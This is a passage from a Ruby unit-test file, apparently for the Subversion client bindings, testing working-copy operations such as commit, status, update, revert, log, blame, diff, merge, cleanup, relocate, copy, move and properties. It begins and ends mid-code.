  path = File.join(@wc_path, file)
  dir_path = File.join(@wc_path, dir)
  ctx = make_context(log)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.mkdir(dir_path)
  ctx.commit(@wc_path)
  ctx.rm([path, dir_path])
  ctx.commit(@wc_path)
  assert(!File.exist?(path))
  assert(!File.exist?(dir_path))
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.commit(@wc_path)
  File.open(path, "w") {|f| f.print(src * 2)} # local modification
  assert_raises(Svn::Error::ClientModified) do
    ctx.rm(path)
  end
  assert_nothing_raised do
    ctx.rm_f(path) # forced variant ignores the modification
    ctx.commit(@wc_path)
  end
  assert(!File.exist?(path))
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.mkdir(dir_path)
  ctx.commit(@wc_path)
  ctx.rm_f(path, dir_path) # multiple paths at once
  ctx.commit(@wc_path)
  assert(!File.exist?(path))
  assert(!File.exist?(dir_path))
end
# import sends an unversioned tree into the repository; after updating the
# working copy, the imported file's content must be present.
def test_import
  src = "source\n"
  log = "sample log"
  deep_dir = File.join(%w(a b c d e))
  file = "sample.txt"
  deep_dir_path = File.join(@wc_path, deep_dir)
  path = File.join(deep_dir_path, file)
  tmp_deep_dir_path = File.join(@tmp_path, deep_dir)
  tmp_path = File.join(tmp_deep_dir_path, file)
  ctx = make_context(log)
  FileUtils.mkdir_p(tmp_deep_dir_path)
  File.open(tmp_path, "w") {|f| f.print(src)}
  ctx.import(@tmp_path, @repos_uri)
  ctx.up(@wc_path)
  assert_equal(src, File.open(path){|f| f.read})
end
# import can attach custom revision properties to the created revision;
# revprop_get must return the value together with the revision it was set on.
def test_import_custom_revprops
  src = "source\n"
  log = "sample log"
  deep_dir = File.join(%w(a b c d e))
  file = "sample.txt"
  deep_dir_path = File.join(@wc_path, deep_dir)
  path = File.join(deep_dir_path, file)
  tmp_deep_dir_path = File.join(@tmp_path, deep_dir)
  tmp_path = File.join(tmp_deep_dir_path, file)
  ctx = make_context(log)
  FileUtils.mkdir_p(tmp_deep_dir_path)
  File.open(tmp_path, "w") {|f| f.print(src)}
  new_rev = ctx.import(@tmp_path, @repos_uri, true, false,
                       {"custom-prop" => "some-value"}).revision
  assert_equal(["some-value", new_rev],
               ctx.revprop_get("custom-prop", @repos_uri, new_rev))
  ctx.up(@wc_path)
  assert_equal(src, File.open(path){|f| f.read})
end
# commit with nothing to send returns INVALID_REVNUM; committing scheduled
# changes bumps the revision, and `ci` is an alias for commit.
def test_commit
  log = "sample log"
  dir1 = "dir1"
  dir2 = "dir2"
  dir1_path = File.join(@wc_path, dir1)
  dir2_path = File.join(dir1_path, dir2)
  ctx = make_context(log)
  assert_equal(Svn::Core::INVALID_REVNUM,ctx.commit(@wc_path).revision)
  ctx.mkdir(dir1_path)
  assert_equal(0, youngest_rev)
  assert_equal(1, ctx.commit(@wc_path).revision)
  ctx.mkdir(dir2_path)
  # recurse=false from the top does not reach the nested new dir
  assert_equal(Svn::Core::INVALID_REVNUM,ctx.commit(@wc_path, false).revision)
  assert_equal(2, ctx.ci(@wc_path).revision)
end
# status reports locally changed paths by default; with the "get all" /
# "update" style flags (via st) it reports every path, and the final two
# calls show the no_ignore flag toggling visibility of svn:ignore'd items.
def test_status
  log = "sample log"
  file1 = "sample1.txt"
  file2 = "sample2.txt"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path1 = File.join(@wc_path, file1)
  path2 = File.join(dir_path, file2)
  ctx = make_context(log)
  File.open(path1, "w") {}
  ctx.add(path1)
  rev1 = ctx.commit(@wc_path).revision
  ctx.mkdir(dir_path)
  File.open(path2, "w") {} # unversioned file inside the new dir
  infos = []
  rev = ctx.status(@wc_path) do |path, status|
    infos << [path, status]
  end
  assert_equal(youngest_rev, rev)
  # only the added dir and the unversioned file are reported
  assert_equal([dir_path, path2].sort,
               infos.collect{|path, status| path}.sort)
  dir_status = infos.assoc(dir_path).last
  assert(dir_status.text_added?)
  assert(dir_status.entry.dir?)
  assert(dir_status.entry.add?)
  path2_status = infos.assoc(path2).last
  assert(!path2_status.text_added?)
  assert_nil(path2_status.entry) # unversioned: no entry
  infos = []
  rev = ctx.st(@wc_path, rev1, true, true) do |path, status|
    infos << [path, status]
  end
  assert_equal(rev1, rev)
  assert_equal([@wc_path, dir_path, path1, path2].sort,
               infos.collect{|path, status| path}.sort)
  wc_status = infos.assoc(@wc_path).last
  assert(wc_status.text_normal?)
  assert(wc_status.entry.dir?)
  assert(wc_status.entry.normal?)
  dir_status = infos.assoc(dir_path).last
  assert(dir_status.text_added?)
  assert(dir_status.entry.dir?)
  assert(dir_status.entry.add?)
  path1_status = infos.assoc(path1).last
  assert(path1_status.text_normal?)
  assert(path1_status.entry.file?)
  assert(path1_status.entry.normal?)
  path2_status = infos.assoc(path2).last
  assert(!path2_status.text_added?)
  assert_nil(path2_status.entry)
  ctx.prop_set(Svn::Core::PROP_IGNORE, file2, dir_path) # ignore file2
  infos = []
  rev = ctx.status(@wc_path, nil, true, true, true, false) do |path, status|
    infos << [path, status]
  end
  assert_equal(rev1, rev)
  # ignored file2 is hidden when no_ignore is false
  assert_equal([@wc_path, dir_path, path1].sort,
               infos.collect{|path, status| path}.sort)
  infos = []
  rev = ctx.status(@wc_path, nil, true, true, true, true) do |path, status|
    infos << [path, status]
  end
  assert_equal(rev1, rev)
  assert_equal([@wc_path, dir_path, path1, path2].sort,
               infos.collect{|path, status| path}.sort)
end
# status honors both the legacy recurse booleans and the depth strings;
# each choice must report exactly the expected subset of the greek tree.
def test_status_with_depth
  setup_greek_tree
  log = "sample log"
  ctx = make_context(log)
  # make everything out-of-date
  ctx.prop_set('propname', 'propvalue', @greek.path(:b), :infinity)
  # a single file target reports just that file for every depth choice
  recurse_and_depth_choices.each do |rd|
    ctx.status(@greek.path(:mu), nil, rd) do |path, status|
      assert_equal @greek.uri(:mu), status.url
    end
  end
  # expected reported nodes under :b for each recurse/depth choice
  expected_statuses_by_depth = {
    true => [:beta, :b, :lambda, :e, :f, :alpha],
    false => [:b, :lambda, :e, :f],
    'empty' => [:b],
    'files' => [:b, :lambda],
    'immediates' => [:b, :lambda, :e, :f],
    'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
  }
  recurse_and_depth_choices.each do |rd|
    urls = []
    ctx.status(@greek.path(:b), nil, rd) do |path, status|
      urls << status.url
    end
    # NOTE: message previously read "depth '#{rd}" with an unbalanced quote
    assert_equal(expected_statuses_by_depth[rd].map{|s| @greek.uri(s)}.sort,
                 urls.sort,
                 "depth '#{rd}'")
  end
end
# checkout recreates a removed working copy; with the final argument false
# (non-recursive via the `co` alias) nested content is not fetched.
def test_checkout
  log = "sample log"
  file = "hello.txt"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  content = "Hello"
  ctx = make_context(log)
  ctx.mkdir(dir_path)
  File.open(path, "w"){|f| f.print(content)}
  ctx.add(path)
  ctx.commit(@wc_path)
  FileUtils.rm_rf(@wc_path)
  ctx.checkout(@repos_uri, @wc_path)
  assert(File.exist?(path))
  FileUtils.rm_rf(@wc_path)
  ctx.co(@repos_uri, @wc_path, nil, nil, false)
  assert(!File.exist?(path))
end
# update restores deleted files to the requested revision (single path or
# array form), raises for a non-existent revision, and silently ignores
# non-existent paths.
def test_update
  log = "sample log"
  file = "hello.txt"
  path = File.join(@wc_path, file)
  content = "Hello"
  File.open(path, "w"){|f| f.print(content)}
  ctx = make_context(log)
  assert_nothing_raised do
    ctx.update(File.join(@wc_path, "non-exist"), youngest_rev)
  end
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  FileUtils.rm(path)
  assert(!File.exist?(path))
  assert_equal(commit_info.revision,
               ctx.update(path, commit_info.revision))
  assert_equal(content, File.read(path))
  FileUtils.rm(path)
  assert(!File.exist?(path))
  # array form returns an array of result revisions
  assert_equal([commit_info.revision],
               ctx.update([path], commit_info.revision))
  assert_equal(content, File.read(path))
  assert_raise(Svn::Error::FS_NO_SUCH_REVISION) do
    begin
      ctx.update(path, commit_info.revision + 1)
    ensure
      ctx.cleanup(@wc_path) # release the WC lock left by the failure
    end
  end
  assert_nothing_raised do
    ctx.update(path + "non-exist", commit_info.revision)
  end
end
# revert restores committed content for a single path, an array of paths,
# or (recursively) a directory; with recurse=false only the directory
# itself is reverted, and reverting a subdirectory leaves siblings alone.
def test_revert
  log = "sample log"
  file1 = "hello1.txt"
  file2 = "hello2.txt"
  file3 = "hello3.txt"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path1 = File.join(@wc_path, file1)
  path2 = File.join(@wc_path, file2)
  path3 = File.join(dir_path, file3)
  content = "Hello"
  ctx = make_context(log)
  File.open(path1, "w"){|f| f.print(content)}
  File.open(path2, "w"){|f| f.print(content)}
  ctx.add(path1)
  ctx.add(path2)
  ctx.mkdir(dir_path)
  File.open(path3, "w"){|f| f.print(content)}
  ctx.add(path3)
  commit_info = ctx.commit(@wc_path)
  # single path
  File.open(path1, "w"){}
  assert_equal("", File.open(path1){|f| f.read})
  ctx.revert(path1)
  assert_equal(content, File.open(path1){|f| f.read})
  # array of paths
  File.open(path1, "w"){}
  File.open(path2, "w"){}
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  ctx.revert([path1, path2])
  assert_equal(content, File.open(path1){|f| f.read})
  assert_equal(content, File.open(path2){|f| f.read})
  # whole working copy, recursive
  File.open(path1, "w"){}
  File.open(path2, "w"){}
  File.open(path3, "w"){}
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  assert_equal("", File.open(path3){|f| f.read})
  ctx.revert(@wc_path)
  assert_equal(content, File.open(path1){|f| f.read})
  assert_equal(content, File.open(path2){|f| f.read})
  assert_equal(content, File.open(path3){|f| f.read})
  # recurse=false reverts nothing below the directory itself
  File.open(path1, "w"){}
  File.open(path2, "w"){}
  File.open(path3, "w"){}
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  assert_equal("", File.open(path3){|f| f.read})
  ctx.revert(@wc_path, false)
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  assert_equal("", File.open(path3){|f| f.read})
  # reverting a subdirectory only touches its own children
  File.open(path1, "w"){}
  File.open(path2, "w"){}
  File.open(path3, "w"){}
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  assert_equal("", File.open(path3){|f| f.read})
  ctx.revert(dir_path)
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  assert_equal(content, File.open(path3){|f| f.read})
end
# log must report, per target path, the revisions touching it together
# with the changed-paths map (action, copied-from info) and log messages.
def test_log
  log1 = "sample log1"
  log2 = "sample log2"
  log3 = "sample log3"
  src1 = "source1\n"
  src2 = "source2\n"
  src3 = "source3\n"
  file1 = "sample1.txt"
  file2 = "sample2.txt"
  file3 = "sample3.txt"
  path1 = File.join(@wc_path, file1)
  path2 = File.join(@wc_path, file2)
  path3 = File.join(@wc_path, file3)
  # changed-paths keys are repository-absolute ("/file")
  abs_path1 = File.join('', file1)
  abs_path2 = File.join('', file2)
  abs_path3 = File.join('', file3)
  ctx = make_context(log1)
  File.open(path1, "w") {|f| f.print(src1)}
  ctx.add(path1)
  rev1 = ctx.ci(@wc_path).revision
  ctx = make_context(log2)
  ctx.cp(path1, path2) # rev2: copy
  rev2 = ctx.ci(@wc_path).revision
  ctx = make_context(log3)
  ctx.cp(path1, path3) # rev3: copy + modify source and copy
  File.open(path1, "w") {|f| f.print(src2)}
  File.open(path3, "w") {|f| f.print(src3)}
  rev3 = ctx.ci(@wc_path).revision
  changed_paths_lists = {}
  revs = {}
  messages = {}
  keys = [@wc_path, path1, path2, path3]
  keys.each do |key|
    revs[key] = []
    changed_paths_lists[key] = []
    messages[key] = []
    args = [key, 1, "HEAD", 0, true, nil]
    ctx.log(*args) do |changed_paths, rev, author, date, message|
      revs[key] << rev
      changed_paths_lists[key] << changed_paths
      messages[key] << message
    end
  end
  changed_paths_list = changed_paths_lists[@wc_path]
  assert_equal([rev1, rev2, rev3], revs[@wc_path])
  assert_equal([rev1, rev3], revs[path1])
  assert_equal([rev1, rev2], revs[path2])
  assert_equal([rev1, rev3], revs[path3])
  assert_equal([log1, log2, log3], messages[@wc_path])
  expected = [[abs_path1], [abs_path2], [abs_path1, abs_path3]]
  actual = changed_paths_list.collect {|changed_paths| changed_paths.keys}
  assert_nested_sorted_array(expected, actual)
  assert_equal('A', changed_paths_list[0][abs_path1].action)
  assert_false(changed_paths_list[0][abs_path1].copied?)
  assert_equal('A', changed_paths_list[1][abs_path2].action)
  assert_true(changed_paths_list[1][abs_path2].copied?)
  assert_equal(abs_path1, changed_paths_list[1][abs_path2].copyfrom_path)
  assert_equal(rev1, changed_paths_list[1][abs_path2].copyfrom_rev)
  assert_equal('M', changed_paths_list[2][abs_path1].action)
  assert_equal('A', changed_paths_list[2][abs_path3].action)
end
# log_message returns the commit message of the given revision for a path.
def test_log_message
  message = "sample log"
  path = File.join(@wc_path, "hello.txt")
  FileUtils.touch(path)
  ctx = make_context(message)
  ctx.add(path)
  rev = ctx.commit(@wc_path).revision
  assert_equal(message, ctx.log_message(path, rev))
end
# blame yields one record per line (line_no, revision, author, date, text);
# once the file is marked with a binary mime type, blame (via the `ann`
# alias) must refuse with CLIENT_IS_BINARY_FILE.
def test_blame
  log = "sample log"
  file = "hello.txt"
  srcs = %w(first second third)
  infos = []
  path = File.join(@wc_path, file)
  ctx = make_context(log)
  File.open(path, "w") {|f| f.puts(srcs[0])}
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  infos << [0, commit_info.revision, @author, commit_info.date, srcs[0]]
  File.open(path, "a") {|f| f.puts(srcs[1])}
  commit_info = ctx.commit(@wc_path)
  infos << [1, commit_info.revision, @author, commit_info.date, srcs[1]]
  File.open(path, "a") {|f| f.puts(srcs[2])}
  commit_info = ctx.commit(@wc_path)
  infos << [2, commit_info.revision, @author, commit_info.date, srcs[2]]
  result = []
  ctx.blame(path) do |line_no, revision, author, date, line|
    result << [line_no, revision, author, date, line]
  end
  assert_equal(infos, result)
  ctx.prop_set(Svn::Core::PROP_MIME_TYPE, "image/DUMMY", path)
  ctx.commit(@wc_path)
  assert_raise(Svn::Error::CLIENT_IS_BINARY_FILE) do
    ctx.ann(path) {}
  end
end
# diff writes unified-diff output to the given file, both for
# rev-vs-WORKING and for rev-vs-rev comparisons.
def test_diff
  log = "sample log"
  before = "before\n"
  after = "after\n"
  file = "hello.txt"
  path = File.join(@wc_path, file)
  File.open(path, "w") {|f| f.print(before)}
  ctx = make_context(log)
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  rev1 = commit_info.revision
  File.open(path, "w") {|f| f.print(after)}
  out_file = Tempfile.new("svn")
  err_file = Tempfile.new("svn")
  ctx.diff([], path, rev1, path, "WORKING", out_file.path, err_file.path)
  out_file.open
  assert_match(/-#{before}\+#{after}\z/, out_file.read)
  commit_info = ctx.commit(@wc_path)
  rev2 = commit_info.revision
  out_file = Tempfile.new("svn")
  ctx.diff([], path, rev1, path, rev2, out_file.path, err_file.path)
  out_file.open
  assert_match(/-#{before}\+#{after}\z/, out_file.read)
end
# diff_peg is the peg-revision variant of diff: a single target with start
# and end revisions; output format must match plain diff's.
def test_diff_peg
  log = "sample log"
  before = "before\n"
  after = "after\n"
  file = "hello.txt"
  path = File.join(@wc_path, file)
  File.open(path, "w") {|f| f.print(before)}
  ctx = make_context(log)
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  rev1 = commit_info.revision
  File.open(path, "w") {|f| f.print(after)}
  out_file = Tempfile.new("svn")
  err_file = Tempfile.new("svn")
  ctx.diff_peg([], path, rev1, "WORKING", out_file.path, err_file.path)
  out_file.open
  assert_match(/-#{before}\+#{after}\z/, out_file.read)
  commit_info = ctx.commit(@wc_path)
  rev2 = commit_info.revision
  out_file = Tempfile.new("svn")
  ctx.diff_peg([], path, rev1, rev2, out_file.path, err_file.path)
  out_file.open
  assert_match(/-#{before}\+#{after}\z/, out_file.read)
end
# diff_summarize yields summary records instead of textual diffs; a content
# change must be reported as a modified file node with no property change.
def test_diff_summarize
  log = "sample log"
  before = "before\n"
  after = "after\n"
  file = "hello.txt"
  path = File.join(@wc_path, file)
  File.open(path, "w") {|f| f.print(before)}
  ctx = make_context(log)
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  rev1 = commit_info.revision
  File.open(path, "w") {|f| f.print(after)}
  commit_info = ctx.commit(@wc_path)
  rev2 = commit_info.revision
  diffs = []
  ctx.diff_summarize(@wc_path, rev1, @wc_path, rev2) do |diff|
    diffs << diff
  end
  assert_equal([file], diffs.collect {|d| d.path})
  kinds = diffs.collect do |d|
    [d.kind_normal?, d.kind_added?, d.kind_modified?, d.kind_deleted?]
  end
  assert_equal([[false, false, true, false]], kinds) # modified only
  assert_equal([false], diffs.collect {|d| d.prop_changed?})
  node_kinds = diffs.collect do |d|
    [d.node_kind_none?, d.node_kind_file?,
     d.node_kind_dir?, d.node_kind_unknown?]
  end
  assert_equal([[false, true, false, false]], node_kinds) # a file node
end
# diff_summarize_peg resolves the target through a peg revision, so the
# rename history (before.txt -> after.txt -> moved.txt) is followed and
# the rev3..rev4 change is reported under the file's name at the peg rev.
def test_diff_summarize_peg
  log = "sample log"
  before = "before\n"
  after = "after\n"
  before_file = "before.txt"
  after_file = "after.txt"
  moved_file = "moved.txt"
  before_path = File.join(@wc_path, before_file)
  after_path = File.join(@wc_path, after_file)
  moved_path = File.join(@wc_path, moved_file)
  File.open(before_path, "w") {|f| f.print(before)}
  ctx = make_context(log)
  ctx.add(before_path)
  commit_info = ctx.commit(@wc_path)
  rev1 = commit_info.revision
  ctx.mv(before_path, after_path) # rev2: rename
  commit_info = ctx.commit(@wc_path)
  rev2 = commit_info.revision
  File.open(after_path, "w") {|f| f.print(after)}
  commit_info = ctx.commit(@wc_path)
  rev3 = commit_info.revision
  File.open(after_path, "w") {|f| f.print(before)}
  commit_info = ctx.commit(@wc_path)
  rev4 = commit_info.revision
  ctx.mv(after_path, moved_path) # rev5: second rename
  commit_info = ctx.commit(@wc_path)
  rev5 = commit_info.revision
  diffs = []
  ctx.diff_summarize_peg(@repos_uri, rev3, rev4, rev3) do |diff|
    diffs << diff
  end
  assert_equal([after_file], diffs.collect {|d| d.path})
  kinds = diffs.collect do |d|
    [d.kind_normal?, d.kind_added?, d.kind_modified?, d.kind_deleted?]
  end
  assert_equal([[false, false, true, false]], kinds)
  assert_equal([false], diffs.collect {|d| d.prop_changed?})
  node_kinds = diffs.collect do |d|
    [d.node_kind_none?, d.node_kind_file?,
     d.node_kind_dir?, d.node_kind_unknown?]
  end
  assert_equal([[false, true, false, false]], node_kinds)
end
# Shared scenario for merge and merge_peg: the block performs one merge
# (ctx, from, rev_a, rev_b, to, *rest). Checks mergeinfo bookkeeping
# (log_merged / merged), merged content, merged deletions, propdel of
# svn:mergeinfo, and finally the record_only (last yield arg) behavior.
def assert_merge
  log = "sample log"
  file = "sample.txt"
  src = "sample\n"
  trunk = File.join(@wc_path, "trunk")
  branch = File.join(@wc_path, "branch")
  branch_relative_uri = "/branch"
  branch_uri = "#{@repos_uri}#{branch_relative_uri}"
  trunk_path = File.join(trunk, file)
  trunk_path_uri = "#{@repos_uri}/trunk/#{file}"
  branch_path = File.join(branch, file)
  branch_path_relative_uri = "#{branch_relative_uri}/#{file}"
  branch_path_uri = "#{@repos_uri}#{branch_path_relative_uri}"
  ctx = make_context(log)
  ctx.mkdir(trunk, branch)
  File.open(trunk_path, "w") {}
  File.open(branch_path, "w") {}
  ctx.add(trunk_path)
  ctx.add(branch_path)
  rev1 = ctx.commit(@wc_path).revision
  File.open(branch_path, "w") {|f| f.print(src)} # change only on branch
  rev2 = ctx.commit(@wc_path).revision
  # nothing merged yet
  merged_entries = []
  ctx.log_merged(trunk, nil, branch_uri, nil) do |entry|
    merged_entries << entry
  end
  assert_equal_log_entries([], merged_entries)
  assert_nil(ctx.merged(trunk))
  merged_entries = []
  yield(ctx, branch, rev1, rev2, trunk) # first merge: branch -> trunk
  ctx.log_merged(trunk, nil, branch_uri, nil) do |entry|
    merged_entries << entry
  end
  assert_equal_log_entries([
                            [
                             {branch_path_relative_uri => ["M", nil, -1]},
                             rev2,
                             {
                               "svn:author" => @author,
                               "svn:log" => log,
                             },
                             false,
                            ]
                           ],
                           merged_entries)
  mergeinfo = ctx.merged(trunk)
  assert_not_nil(mergeinfo)
  assert_equal([branch_uri], mergeinfo.keys)
  ranges = mergeinfo[branch_uri].collect {|range| range.to_a}
  assert_equal([[1, 2, true]], ranges)
  rev3 = ctx.commit(@wc_path).revision
  assert_equal(normalize_line_break(src), ctx.cat(trunk_path, rev3))
  ctx.rm(branch_path) # deletion on branch
  rev4 = ctx.commit(@wc_path).revision
  yield(ctx, branch, rev3, rev4, trunk) # merge the deletion
  assert(!File.exist?(trunk_path))
  merged_entries = []
  ctx.log_merged(trunk, rev4, branch_uri, rev4) do |entry|
    merged_entries << entry
  end
  assert_equal_log_entries([
                            [
                             {branch_path_relative_uri => ["D", nil, -1]},
                             rev4,
                             {
                               "svn:author" => @author,
                               "svn:log" => log,
                             },
                             false,
                            ]
                           ] * 2, merged_entries)
  # removing svn:mergeinfo hides the merge history
  ctx.propdel("svn:mergeinfo", trunk)
  merged_entries = []
  ctx.log_merged(trunk, rev4, branch_uri, rev4) do |entry|
    merged_entries << entry
  end
  assert_equal_log_entries([], merged_entries)
  ctx.revert(trunk)
  ctx.revert(trunk_path)
  File.open(trunk_path, "a") {|f| f.print(src)}
  yield(ctx, branch, rev3, rev4, trunk)
  rev5 = ctx.commit(@wc_path).revision
  assert(File.exist?(trunk_path))
  # record-only merge (last true): no working-copy changes reported
  yield(ctx, branch, rev3, rev4, trunk, nil, false, true, true)
  statuses = []
  ctx.status(trunk) do |path, status|
    statuses << status
  end
  assert_equal([], statuses)
  # same merge without record-only does change the working copy
  yield(ctx, branch, rev3, rev4, trunk, nil, false, true)
  statuses = []
  ctx.status(trunk) do |path, status|
    statuses << status
  end
  assert_not_equal([], statuses)
end
# Exercise the two-source merge entry point through the shared scenario.
def test_merge
  assert_merge do |ctx, source, rev_a, rev_b, target, *rest|
    ctx.merge(source, rev_a, source, rev_b, target, *rest)
  end
end
# Exercise the peg-revision merge entry point through the shared scenario.
def test_merge_peg
  assert_merge do |ctx, source, rev_a, rev_b, target, *rest|
    ctx.merge_peg(source, rev_a, rev_b, target, nil, *rest)
  end
end
# cleanup releases working-copy locks left by an interrupted operation;
# it must also honor the cancellation callback (raising CANCELLED leaves
# the lock in place).
def test_cleanup
  log = "sample log"
  file = "sample.txt"
  src = "sample\n"
  path = File.join(@wc_path, file)
  ctx = make_context(log)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  rev = ctx.commit(@wc_path).revision
  ctx.up(@wc_path, rev - 1)
  File.open(path, "w") {|f| f.print(src)} # obstructs the next update
  assert_raise(Svn::Error::WC_OBSTRUCTED_UPDATE) do
    ctx.up(@wc_path, rev)
  end
  Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1) do |access|
    assert_raise(Svn::Error::WC_LOCKED) do
      ctx.commit(@wc_path)
    end
  end
  ctx.set_cancel_func do
    raise Svn::Error::CANCELLED
  end
  Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1) do |access|
    assert_raise(Svn::Error::CANCELLED) do
      ctx.cleanup(@wc_path) # cancelled: lock stays
    end
    assert_raise(Svn::Error::WC_LOCKED) do
      ctx.commit(@wc_path)
    end
  end
  ctx.set_cancel_func(nil)
  access = Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1)
  assert_nothing_raised do
    ctx.cleanup(@wc_path) # breaks the outstanding lock
  end
  assert_nothing_raised do
    ctx.commit(@wc_path)
  end
  assert_raises(Svn::Error::SvnError) do
    access.close # its lock was already broken by cleanup
  end
end
# relocate repoints the working copy at the svnserve URI; a fresh context
# without an auth provider must then fail with AuthnNoProvider.
def test_relocate
  log = "sample log"
  file = "sample.txt"
  src = "sample\n"
  path = File.join(@wc_path, file)
  ctx = make_context(log)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.commit(@wc_path)
  assert_nothing_raised do
    ctx.cat(path)
  end
  # credentials needed once the WC points at the svnserve URI
  ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
    cred.username = @author
    cred.password = @password
    cred.may_save = true
  end
  ctx.relocate(@wc_path, @repos_uri, @repos_svnserve_uri)
  ctx = make_context(log) # new context: no auth provider registered
  assert_raises(Svn::Error::AuthnNoProvider) do
    ctx.cat(path)
  end
end
# A conflicted file blocks commit until resolved; resolving the parent dir
# non-recursively is not enough, the default (recursive) resolved call is.
def test_resolved
  log = "sample log"
  file = "sample.txt"
  dir = "dir"
  src1 = "before\n"
  src2 = "after\n"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  ctx = make_context(log)
  ctx.mkdir(dir_path)
  File.open(path, "w") {}
  ctx.add(path)
  rev1 = ctx.ci(@wc_path).revision
  File.open(path, "w") {|f| f.print(src1)}
  rev2 = ctx.ci(@wc_path).revision
  ctx.up(@wc_path, rev1) # go back, then edit to manufacture a conflict
  File.open(path, "w") {|f| f.print(src2)}
  ctx.up(@wc_path)
  assert_raises(Svn::Error::WcFoundConflict) do
    ctx.ci(@wc_path)
  end
  ctx.resolved(dir_path, false) # non-recursive: conflict remains
  assert_raises(Svn::Error::WcFoundConflict) do
    ctx.ci(@wc_path)
  end
  ctx.resolved(dir_path) # recursive: conflict cleared
  info = nil
  assert_nothing_raised do
    info = ctx.ci(@wc_path)
  end
  assert_not_nil(info)
  assert_equal(rev2 + 1, info.revision)
end
# cp schedules a working-copy copy; on commit only the new path is
# notified (as commit-added) and the file contents are identical.
def test_copy
  log = "sample log"
  src = "source\n"
  file1 = "sample1.txt"
  file2 = "sample2.txt"
  path1 = File.join(@wc_path, file1)
  path2 = File.join(@wc_path, file2)
  ctx = make_context(log)
  File.open(path1, "w") {|f| f.print(src)}
  ctx.add(path1)
  ctx.ci(@wc_path)
  ctx.cp(path1, path2)
  infos = []
  ctx.set_notify_func do |notify|
    infos << [notify.path, notify]
  end
  ctx.ci(@wc_path)
  assert_equal([path2].sort,
               infos.collect{|path, notify| path}.sort)
  path2_notify = infos.assoc(path2)[1]
  assert(path2_notify.commit_added?)
  assert_equal(File.open(path1) {|f| f.read},
               File.open(path2) {|f| f.read})
end
# mv schedules a move; on commit the old path is notified as deleted and
# the new path as added, and content follows the file.
def test_move
  log = "sample log"
  src = "source\n"
  file1 = "sample1.txt"
  file2 = "sample2.txt"
  path1 = File.join(@wc_path, file1)
  path2 = File.join(@wc_path, file2)
  ctx = make_context(log)
  File.open(path1, "w") {|f| f.print(src)}
  ctx.add(path1)
  ctx.ci(@wc_path)
  ctx.mv(path1, path2)
  infos = []
  ctx.set_notify_func do |notify|
    infos << [notify.path, notify]
  end
  ctx.ci(@wc_path)
  assert_equal([path1, path2].sort,
               infos.collect{|path, notify| path}.sort)
  path1_notify = infos.assoc(path1)[1]
  assert(path1_notify.commit_deleted?)
  path2_notify = infos.assoc(path2)[1]
  assert(path2_notify.commit_added?)
  assert_equal(src, File.open(path2) {|f| f.read})
end
# mv on a locally modified file succeeds here, and mv_f (forced move) is
# also exercised; commit notifications must classify the old path as
# deleted and the new path as added with a postfix text delta.
def test_move_force
  log = "sample log"
  src1 = "source1\n"
  src2 = "source2\n"
  file1 = "sample1.txt"
  file2 = "sample2.txt"
  path1 = File.join(@wc_path, file1)
  path2 = File.join(@wc_path, file2)
  ctx = make_context(log)
  File.open(path1, "w") {|f| f.print(src1)}
  ctx.add(path1)
  ctx.ci(@wc_path)
  File.open(path1, "w") {|f| f.print(src2)} # local modification
  assert_nothing_raised do
    ctx.mv(path1, path2)
  end
  ctx.revert([path1, path2])
  FileUtils.rm(path2)
  File.open(path1, "w") {|f| f.print(src2)}
  assert_nothing_raised do
    ctx.mv_f(path1, path2) # forced variant
  end
  notifies = []
  ctx.set_notify_func do |notify|
    notifies << notify
  end
  ctx.ci(@wc_path)
  paths = notifies.collect do |notify|
    notify.path
  end
  # path2 appears twice: once as added, once for the text delta
  assert_equal([path1, path2, path2].sort, paths.sort)
  deleted_paths = notifies.find_all do |notify|
    notify.commit_deleted?
  end.collect do |notify|
    notify.path
  end
  assert_equal([path1].sort, deleted_paths.sort)
  added_paths = notifies.find_all do |notify|
    notify.commit_added?
  end.collect do |notify|
    notify.path
  end
  assert_equal([path2].sort, added_paths.sort)
  postfix_txdelta_paths = notifies.find_all do |notify|
    notify.commit_postfix_txdelta?
  end.collect do |notify|
    notify.path
  end
  assert_equal([path2].sort, postfix_txdelta_paths.sort)
  assert_equal(src2, File.open(path2) {|f| f.read})
end
# Exercises the property API and its aliases (prop_get/pget/pg,
# prop_set/ps, prop_del/pdel/pd): setting, deleting (including via a nil
# value), recursive get, non-recursive set/del, and the mime-type
# validation with its skip-check override.
def test_prop
  log = "sample log"
  dir = "dir"
  file = "sample.txt"
  dir_path = File.join(@wc_path, dir)
  dir_uri = "#{@repos_uri}/#{dir}"
  path = File.join(dir_path, file)
  uri = "#{dir_uri}/#{file}"
  prop_name = "sample-prop"
  prop_value = "sample value"
  invalid_mime_type_prop_value = "image" # not a valid "type/subtype"
  ctx = make_context(log)
  ctx.mkdir(dir_path)
  File.open(path, "w") {}
  ctx.add(path)
  ctx.commit(@wc_path)
  assert_equal({}, ctx.prop_get(prop_name, path))
  ctx.prop_set(prop_name, prop_value, path)
  ctx.commit(@wc_path)
